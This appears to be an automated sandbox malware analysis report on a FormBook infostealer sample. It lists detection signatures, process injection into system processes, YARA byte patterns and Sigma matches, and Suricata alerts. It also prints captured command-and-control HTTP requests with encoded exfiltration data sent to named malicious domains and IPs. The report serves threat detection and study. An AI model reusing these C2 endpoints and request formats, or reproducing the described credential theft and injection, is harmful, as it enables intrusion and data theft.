Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3T-ENQ-O-2024-10856.exe

Overview

General Information

Sample name:3T-ENQ-O-2024-10856.exe
Analysis ID:1509340
MD5:b2218f5d997fcad8ffd678a82ca0a9b2
SHA1:dc6ecd5bc824bfc835338af196dbdd04859f5ff8
SHA256:09ac6376b07a7b513e3250e66dda03697803dc861dab52ed3a297046b6f1e065
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 3T-ENQ-O-2024-10856.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe" MD5: B2218F5D997FCAD8FFD678A82CA0A9B2)
    • svchost.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • CgEnKbPFVbMNeA.exe (PID: 5452 cmdline: "C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7620 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • CgEnKbPFVbMNeA.exe (PID: 4884 cmdline: "C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7868 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", CommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", ParentImage: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, ParentProcessId: 7308, ParentProcessName: 3T-ENQ-O-2024-10856.exe, ProcessCommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", ProcessId: 7368, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", CommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", ParentImage: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, ParentProcessId: 7308, ParentProcessName: 3T-ENQ-O-2024-10856.exe, ProcessCommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", ProcessId: 7368, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T14:25:23.685445+020028554651A Network Trojan was detected192.168.2.11497103.33.130.19080TCP
            2024-09-11T14:25:47.733495+020028554651A Network Trojan was detected192.168.2.114971418.139.62.22680TCP
            2024-09-11T14:26:01.474977+020028554651A Network Trojan was detected192.168.2.114971866.81.203.1080TCP
            2024-09-11T14:26:15.364789+020028554651A Network Trojan was detected192.168.2.1149722103.42.108.4680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T14:25:40.404921+020028554641A Network Trojan was detected192.168.2.114971118.139.62.22680TCP
            2024-09-11T14:25:42.624519+020028554641A Network Trojan was detected192.168.2.114971218.139.62.22680TCP
            2024-09-11T14:25:45.179370+020028554641A Network Trojan was detected192.168.2.114971318.139.62.22680TCP
            2024-09-11T14:25:53.594449+020028554641A Network Trojan was detected192.168.2.114971566.81.203.1080TCP
            2024-09-11T14:25:56.139554+020028554641A Network Trojan was detected192.168.2.114971666.81.203.1080TCP
            2024-09-11T14:25:58.725921+020028554641A Network Trojan was detected192.168.2.114971766.81.203.1080TCP
            2024-09-11T14:26:07.700537+020028554641A Network Trojan was detected192.168.2.1149719103.42.108.4680TCP
            2024-09-11T14:26:10.257388+020028554641A Network Trojan was detected192.168.2.1149720103.42.108.4680TCP
            2024-09-11T14:26:12.825439+020028554641A Network Trojan was detected192.168.2.1149721103.42.108.4680TCP
            2024-09-11T14:26:20.868957+020028554641A Network Trojan was detected192.168.2.11497233.33.130.19080TCP
            2024-09-11T14:26:23.445179+020028554641A Network Trojan was detected192.168.2.11497243.33.130.19080TCP
            2024-09-11T14:26:26.521061+020028554641A Network Trojan was detected192.168.2.11497253.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: 3T-ENQ-O-2024-10856.exeReversingLabs: Detection: 34%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 3T-ENQ-O-2024-10856.exeJoe Sandbox ML: detected
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CgEnKbPFVbMNeA.exe, 00000004.00000002.2598819494.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2598388539.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365624481.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363613646.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1717999457.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715868537.0000000003700000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1814673668.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1812307796.000000000351B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003870000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365624481.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363613646.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1717999457.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715868537.0000000003700000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000003.1814673668.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1812307796.000000000351B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003870000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1812499101.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1779767157.0000000003414000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000003.1750564204.00000000009FB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1812499101.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1779767157.0000000003414000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000003.1750564204.00000000009FB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C7DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DD92
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CB2044
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CB219F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CB24A9
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00CA6B3F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00CA6E4A
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CAF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CAF350
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CAFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CAFDD2
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CAFD47 FindFirstFileW,FindClose,0_2_00CAFD47
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0301C0D0 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C0D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax5_2_03009B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi5_2_03022168
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi5_2_03022185
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h5_2_036104DF

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49710 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49711 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49712 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49717 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49715 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49720 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49716 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49721 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49713 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49718 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49722 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49719 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49723 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49714 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49724 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49725 -> 3.33.130.190:80
            Source: Joe Sandbox ViewIP Address: 18.139.62.226 18.139.62.226
            Source: Joe Sandbox ViewIP Address: 103.42.108.46 103.42.108.46
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
            Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CB550C
            Source: global trafficHTTP traffic detected: GET /gqyt/?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth- HTTP/1.1Host: www.chamadaslotgiris.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU= HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /osde/?yXf=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sZHqZF0jtyzh4SZws5yKjtHhCwOPV3WXnk7o=&ndk=ctppWTth- HTTP/1.1Host: www.mediaplug.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /yl6y/?yXf=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+TDdCZJ74ZBA3ZkRiMUCXQcAhgpMcC+j5S2A=&ndk=ctppWTth- HTTP/1.1Host: www.independent200.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.linkbasic.net
            Source: global trafficDNS traffic detected: DNS query: www.chamadaslotgiris.net
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.mediaplug.biz
            Source: global trafficDNS traffic detected: DNS query: www.independent200.org
            Source: global trafficDNS traffic detected: DNS query: www.tigre777gg.online
            Source: unknownHTTP traffic detected: POST /p5rq/ HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USConnection: closeContent-Length: 200Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.masteriocp.onlineReferer: http://www.masteriocp.online/p5rq/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 79 58 66 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 76 68 59 70 68 74 35 2b 5a 34 2b 33 76 79 50 2b 32 69 6f 68 72 51 4a 62 67 47 5a 61 69 36 2b 53 6f 67 3d 3d Data Ascii: yXf=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7vhYpht5+Z4+3vyP+2iohrQJbgGZai6+Sog==
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Wed, 11 Sep 2024 12:26:07 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Wed, 11 Sep 2024 12:26:10 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Wed, 11 Sep 2024 12:26:12 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Wed, 11 Sep 2024 12:26:15 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: CgEnKbPFVbMNeA.exe, 00000008.00000002.2601820210.000000000546B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tigre777gg.online
            Source: CgEnKbPFVbMNeA.exe, 00000008.00000002.2601820210.000000000546B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tigre777gg.online/06rp/
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
